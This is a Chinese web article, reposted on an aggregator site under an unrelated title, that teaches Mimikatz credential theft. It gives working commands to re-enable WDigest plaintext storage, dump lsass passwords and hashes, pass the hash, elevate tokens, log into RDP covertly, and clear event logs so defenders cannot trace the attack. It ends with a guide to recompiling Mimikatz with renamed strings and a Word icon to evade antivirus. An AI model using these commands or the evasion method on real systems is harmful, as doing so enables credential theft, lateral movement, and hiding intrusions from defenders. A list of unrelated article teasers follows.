360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本站部分内容由互联网用户自发贡献,该文观点仅代表作者本人,本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如发现本站有涉嫌抄袭侵权/违法违规等内容,请联系我们举报!一经查实,本站将立刻删除。

(0)

相关推荐

  • 快速小程序开发,开发微信小程序教程

    微信小程序近两年占领了原生APP的大片江山,导致了原来的Android和IOS开发人员大量转型和失业。 微信小程序的小巧以及“拿来即用”的特点,已经被广大用户习惯性的接受了。现在就连百度、阿里、今日头条都在纷纷打造小程序平台。 如何快速的开发一款小程序呢?第一步就得选好开发工具和框架。小编也亲自开发过多个小程序,根据多年的开发经验,这里给大家推荐Uniapp…

    2023-07-12
  • 误格式化数据恢复,高级格式化会导致硬盘数据丢失吗

    高级格式化会使数据丢失吗?首先我们理解一下高级格式化是什么意思,高级格式化又称逻辑格式化,它意思是结合用户所选的文件系统,在磁盘的对应区域写入对应数据,以起到初始化磁盘或磁盘分区、清理掉原磁盘或磁盘分区中一切文件的一项操作。简单的说高级格式化会清除所有数据以实现初始化。如果没有备份数据的话,高级格式化会使数据丢失。 高级格式化和低级格式化的区别 一、指代不同…

    2023-06-29 用户投稿
  • 生理需求和年龄有关系吗,什么是生理需求

    前几天,小九在某个群里看到几个男生在“吹水”,话题越聊越露骨,涉及不少女性相关内容。 原本小九不想多嘴的,直到他们分享了某平台的一个问题: 好家伙,这个问题从提问到回答,都充满对女性的误解。为了“纠正”广大男性多年来的偏见,小九决定好好写一篇文章,给大家科普科普。一、影响需求的因素,不只是年龄人人都有七情六欲,生理需求是人类最原始的本能之一,是确认性别、表达…

    2023-07-06 用户投稿
  • 正版win11系统,微软win11发布

    IT之家 2 月 22 日消息,微软今天向 Release Preview 频道推送了 Windows 11 22H2 build 22621.1343(KB5022913),更新包含一些与搜索有关的新功能,并在故障排除器中的设置应用程序中为 Quick Assist 增加了一个链接,对系统托盘和电源管理进行了一些修改,以减少碳足迹。微软还公开表示,他们已经…

    2023-07-09
  • 光子嫩肤到底好不好,什么叫做光子嫩肤

    想必大家都听说过光子嫩肤吧,传说中可以给皮肤祛皱的神器,究竟什么是光子,什么是光子嫩肤呢,今天我们就来说一说。 光子医学术语称它为非相干性强脉冲光,简称IPL,是20世纪90年代中期开始发展起来的一种较新的治疗技术。它不是激光,但其工作原理与激光一样,主要用于皮肤美容,它是由闪光灯产生和发射的一种波长为500~1200nm的强的复合光,这种光在本质上和日光是…

    2023-07-04
  • 淘宝搭配套餐怎么弄(淘宝怎么设置搭配套餐)

    现在在淘宝上购物的人是比较多的,而在购物的时候,淘宝系统会自动设置推荐商品,进行搭配,这就是淘宝的搭配宝的工具,那么具体淘宝搭配宝效果怎么样了?   天猫“搭配宝”与集市“搭配套餐”工具将全面合并升级,并更名为“搭配宝”! 新搭配宝核心功能:店铺内商品关联搭配工具,支持固定及自由搭配;加入智能算法,推荐适合的搭配商品,帮助店铺提升客单价和转化率;同…

    2021-11-08
  • 移动有没有流量卡(移动有没有流量卡买)

    进入5G时代后,三大运营商的“抢客户”大战愈演愈烈。以中国移动为例,今年不少地区的用户都收到了他们打来的定向营销电话,免费送给客户10GB的流量,为期三个月。 但就是这样一个看似很给力的行为,却引发了一段争议。原来,这10个G的流量是5G网络定向流量,也就是说必须是5G手机才能使用,并且即便是5G手机,也需要手动开启5G网络才行。 这意味着,像近两年华为推出…

    2023-05-28
  • 日军为什么不敢杀拉贝,为什么日军不敢杀拉贝?

    简介:二战时期,纳粹德国臭名昭著,尤其是对犹太人的屠杀更是引起很大的争议。当然了,一个群体大了,总会有那么一些坏人,但也会有那么一些好人。纳粹党员约翰·拉贝先生被人民画报评价为“南京大屠杀中的洋菩萨”,在十大国际友人排行榜中更是排名第二,仅次于白求恩医生。这位“洋菩萨”在南京挽救了25万中国人,但是晚年全家险些被饿死,消息传回中国后,南京市民为其募捐1个亿,…

    用户投稿 2023-05-10
  • 注射丰唇手术,注射丰唇手术多少钱

    人们看到下图这样嘴唇和眼睛都大到夸张的芭比娃娃,都会觉得可爱。 然而,如果现实里有人把自己整成芭比娃娃的样子,人们是否还会觉得可爱? 你没看错,照片里的女孩名叫Andrea Ivanova,今年22岁,来自保加利亚索菲亚。 上周二,刚刚经历了第20次注射丰唇手术的她,在社媒上分享了自己最新的照片,再度引发了轰动…… 如今已经彻底成为“真人芭比”的她,表示还要…

    2023-07-05 用户投稿
  • 蝎子养殖市场,蝎子养殖:最佳养殖方法、种类和价格

    蝎子是名贵中药材,其药用、食用双重价值俱佳,有人称其为“21世纪的黄金产业”。新的养蝎技术–花园式养蝎,具有仿野生、仔蝎成活率高、管理粗放、收益高、投资少等特点。 蝎子养殖:蝎子的四个分龄饲养段 1、场地选择 蝎场要背风向阳、远离工业污染。土质以微酸或微碱壤土或沙壤土为宜,同时还要避开周围50米内有可能使用剧毒农药的地方。 蝎池建造 3、码置垛体…

    用户投稿 2023-05-18
  • 市场准入负面清单(市场准入负面清单的意义)

    3月25日,《市场准入负面清单(2022年版)》(以下简称《清单(2022年版)》)发布,列有禁止准入事项6项,许可准入事项111项,共计117项,相比《市场准入负面清单(2020年版)》减少6项。 市场准入负面清单制度实施5年以来,按照信息公开和动态调整机制合法依规增减,与2016年试行的《市场准入负面清单草案(试点版)》328个事项相比,缩减比例高达64…

    用户投稿 2023-06-16